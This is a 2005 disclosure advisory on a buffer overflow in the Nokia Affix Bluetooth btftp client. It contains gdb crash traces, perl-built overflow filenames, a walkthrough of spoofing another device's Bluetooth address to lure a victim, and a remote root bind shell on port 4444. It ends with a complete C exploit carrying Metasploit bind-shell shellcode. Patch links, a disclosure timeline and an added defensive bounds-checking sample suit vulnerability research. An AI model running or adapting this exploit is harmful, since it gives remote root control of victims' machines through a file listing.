DMA[2005-0712a] - 'Nokia Affix Bluetooth btftp client buffer overflow'
Author: Kevin Finisterre
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net
Product: 'affix'
References:
http://www.digitalmunition.com/DMA[2005-0712a].txt
Description:
Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia Research Center in Helsinki and released under GPL. Affix supports the core Bluetooth protocols like HCI, L2CAP 1.1, L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of 'affix-kernel' which provides kernel modules and 'affix' which provides control tools, libraries, and server daemons.
Although Nokia believes that Affix is a useful piece of software, please bear in mind that it is not an official Nokia product, but a result of the research activity of Nokia Research Center.
The Affix Bluetooth client utility 'btftp' contains a buffer overflow in the processing of long filenames. By placing a 102 character filename into a public Bluetooth share you are able to overwrite EIP (on an x86 version) of the btftp client.
In this example the machine 'frieza' (00:11:95:4f:60:1f) is running btsrv with OBEX File Transfer.
Place a test file in the public bluetooth share.
root@frieza:/var/spool/affix/Inbox# touch `perl -e 'print "41" x 98' . "DCBA"`
Connect from a vulnerable client machine in order to demonstrate the overflow.
Starting program: /usr/bin/btctl ftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
----- 0 AAAAAAAAAAAAA...AAAAAAAAAAAAAADCBA
d---- 0 Faxes
d---- 0 New Folder
d---- 0 SC Info
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) i r
eax 0x10 16
ecx 0x0 0
edx 0x4001a1e3 1073848803
ebx 0x41414141 1094795585
esp 0xbffffbc0 0xbffffbc0
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41424344 0x41424344
(gdb) x/4s $esp-100
0xbffffb5c: " Info"
0xbffffb62: "er"
0xbffffb65: 'A' <repeats 87 times>, "DCBA"
0xbffffbc1: " \001@À\217\005\b"
As a quick test we will use anathema@xxxxxxxxxx's 0xff-less execve() /bin/sh shellcode and a bit of perl to see if we can execute code.
root@frieza:~# cd /var/spool/affix/Inbox/
root@frieza:/var/spool/affix/Inbox# touch `perl -e 'print "\x90" x
(94-45)'``../ffless``perl -e 'print "\x5b\xfb\xff\xbf" x10 '`
root@frieza:/var/spool/affix/Inbox# ls
?????????????????????????????????????????????????????0?.bin@???.sh!@?F?)??F??v??F??????K??S???[???[???[???[???[???[???[???[???[???[???
As you can see we are able to run our payload on the client machine, however in this case the shellcode needs to be swapped out for something more useful.
threat:~# btftp
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
-rwdx 1512 ffless.c
-rwdx 12605 ffless
-rwdx 0 °
Í
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40000c20 in ?? () from /lib/ld-linux.so.2
(gdb) c
Continuing.
sh-2.05b#
Keep in mind that in order to exploit this the attacker MUST be able to convince the target to browse an OBEX file share that is under control of the attacker. Using an Ericsson ROK 101 008 Bluetooth chip will increase our chances of success. An example impersonation scenario is shown below.
First let's find someone to impersonate.
root@frieza:~# btctl discovery
Searching 8 sec ...
Searching done. Resolving names ...
done.
+1: Address: 00:0c:76:46:f0:21, Class: 0xB20104, Key: "no", Name: "threat"
Computer (Desktop) [Networking,Object Transfer,Audio,Information]
+2: Address: 00:10:60:29:4f:f1, Class: 0x420210, Key: "no", Name: "Bluetooth Modem"
Phone (Wired Modem/VoiceGW) [Networking,Telephony]
+3: Address: 00:04:3e:65:a1:c8, Class: 0x120110, Key: "no", Name: "Pocket_PC"
Computer (Handheld PC/PDA) [Networking,Object Transfer]
Let's pretend to be some poor chap's PDA! We need to steal his BD_ADDR first.
root@frieza:~# btctl
bt0 01:02:03:04:05:06
Flags: UP DISC CONN
RX: acl:159 sco:0 event:97 bytes:4810 errors:0 dropped:0
TX: acl:168 sco:0 cmd:29 bytes:19267 errors:0 dropped:0
Security: service pair [-auth, -encrypt]
Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
Role: deny switch, remain slave
root@frieza:~# wget http://www.digitalmunition.com/setbd-affix.c
--11:50:18-- http://www.digitalmunition.com/setbd-affix.c
=> `setbd-affix.c'
Resolving www.digitalmunition.com... 195.74.102.163
Connecting to www.digitalmunition.com[195.74.102.163]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,951 [text/plain]
100%[================================================================================>]
2,951 --.--K/s
11:50:19 (29.36 KB/s) - `setbd-affix.c' saved [2951/2951]
root@frieza:~# cc -o setbd-affix setbd-affix.c -laffix
root@frieza:~# ./setbd-affix 00:04:3e:65:a1:c8
Using BD_ADDR from command line
Setting BDA to 00:04:3e:65:a1:c8
root@frieza:~# btctl reset
root@frieza:~# btctl down
root@frieza:~# btctl up
btctl: cmd_initdev: Unable to start device (bt0)
root@frieza:~# btctl up
root@frieza:~# btctl
bt0 00:04:3e:65:a1:c8
Flags: UP DISC CONN
RX: acl:159 sco:0 event:126 bytes:5796 errors:0 dropped:0
TX: acl:168 sco:0 cmd:52 bytes:19885 errors:0 dropped:0
Security: service pair [-auth, -encrypt]
Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
Role: deny switch, remain slave
root@frieza:~# btctl name "Pocket_PC"
God I love my ROK chip!
Start up btsrv and wait for a connection from your target.
btsrv: main: btsrv started [Affix 2.1.2].
btsrv: start_service: Bound service Serial Port to port 1
btsrv: start_service: Bound service Dialup Networking to port 2
btsrv: start_service: Bound service Dialup Networking Emulation to port 3
btsrv: start_service: Bound service Fax Service to port 4
btsrv: start_service: Bound service LAN Access to port 5
btsrv: start_service: Bound service OBEX File Transfer to port 6
btsrv: start_service: Bound service OBEX Object Push to port 7
btsrv: start_service: Bound service Headset to port 8
btsrv: start_service: Bound service HeadsetAG to port 9
btsrv: start_service: Bound service HandsFree to port 10
btsrv: start_service: Bound service HandsFreeAG to port 11
You can tell that the target has connected by looking for the following in your btsrv logs.
btsrv: handle_input: Connection from 00:0c:76:46:f0:21
channel 6 (OBEX File Transfer Profile)
btsrv: execute_cmd: Socket multiplexed to stdin/stdout
btsrv: signal_handler: Sig handler : 2
Upon connecting and performing a file list the target would see the following.
threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
Ϲ¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0
At this point your payload is running.
After they have been exploited you could use a hijacked PAND connection to obtain your shell prompt, or perhaps write some Bluetooth-aware shellcode.
root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found
Official patches for Affix can be found at http://affix.sourceforge.net
http://affix.sourceforge.net/affix_320_sec.patch
http://affix.sourceforge.net/affix_212_sec.patch
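As an added illustration (not code from Affix, its patches, or the advisory author), this is the kind of bounded handling a client needs when it displays server-supplied file names from a folder listing such as the one above. The names format_entry and ENTRY_MAX, the 64-byte cap and the output format are assumptions made for the example; the sample names are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define ENTRY_MAX 64 /* assumed cap on a displayable name, terminator included */

/* Format one listing line from untrusted, server-supplied fields.
 * name/namelen come off the wire, so the length is checked before any copy.
 * Returns 0 on success, -1 if the name was rejected or the line did not fit;
 * for outsz > 0, out is NUL-terminated and never written past outsz. */
int format_entry(char *out, size_t outsz, const char *mode,
                 unsigned long size, const char *name, size_t namelen)
{
    char safe[ENTRY_MAX];
    int n;

    if (namelen == 0 || namelen >= sizeof(safe)) {
        snprintf(out, outsz, "%s %lu <name rejected: %lu bytes>",
                 mode, size, (unsigned long)namelen);
        return -1;
    }
    for (size_t i = 0; i < namelen; i++) {
        unsigned char c = (unsigned char)name[i];
        /* Raw bytes must not reach the terminal; show a placeholder instead. */
        safe[i] = isprint(c) ? (char)c : '?';
    }
    safe[namelen] = '\0';
    n = snprintf(out, outsz, "%s %lu %s", mode, size, safe);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

int main(void)
{
    char line[128], longname[103];

    /* Constructed sample: a 102-byte name like the one in the advisory. */
    memset(longname, 'A', 98);
    memcpy(longname + 98, "DCBA", 5);
    format_entry(line, sizeof(line), "-----", 0, longname, strlen(longname));
    puts(line);
    format_entry(line, sizeof(line), "d----", 0, "SC Info", 7);
    puts(line);
    return 0;
}
```

A rejected or sanitised entry is also a useful thing to log on the client, since a listing that contains oversized or non-printable names is itself a sign that the share should not be trusted.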
This is the basic timeline associated with this bug.
07/12/05 Public disclosure
07/11/05 Noticed that Security update. Patch for affix-3.2.0 was posted 07/01/05
07/06/05 Ask Carlos for update...
07/05/05 str0ke dropped code on milw0rm - http://www.milw0rm.com/id.php?id=1081
06/17/05 Carlos.Chinea stated "you are using a old version of affix...Please update"
06/14/05 Carlos.Chinea contacted
-KF
/*
Remote Nokia Affix btftp client exploit
by kf_lists[at]secnetops[dot]com
threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
Ϲ¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0
----------------------
root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found
*/
#include <stdio.h>
#include <strings.h>
main()
{
FILE *malfile;
/* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex
http://metasploit.com */
unsigned char scode[] =
"\x33\xc9\x83\xe9\xeb\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x99"
"\xee\x30\x5e\x83\xee\xfc\xe2\xf4\xa8\x35\x63\x1d\xca\x84\x32\x34"
"\xff\xb6\xa9\xd7\x78\x23\xb0\xc8\xda\xbc\x56\x36\x88\xb2\x56\x0d"
"\x10\x0f\x5a\x38\xc1\xbe\x61\x08\x10\x0f\xfd\xde\x29\x88\xe1\xbd"
"\x54\x6e\x62\x0c\xcf\xad\xb9\xbf\x29\x88\xfd\xde\x0a\x84\x32\x07"
"\x29\xd1\xfd\xde\xd0\x97\xc9\xee\x92\xbc\x58\x71\xb6\x9d\x58\x36"
"\xb6\x8c\x59\x30\x10\x0d\x62\x0d\x10\x0f\xfd\xde";
char buf[1024];
memset(buf,'\0',sizeof(buf));
memset(buf,'\x90',94);
strcat(buf+94,"\x75\xfb\xff\xbf");
strcat(buf+98,"\x75\xfb\xff\xbf");
memset(buf+102,'\x90',40);
strcat(buf+142,scode);
if(!(malfile = fopen(buf,"w+"))) {
printf("error opening file\n");
exit(1);
}
fprintf(malfile, "pwned\n" );
fclose(malfile);
}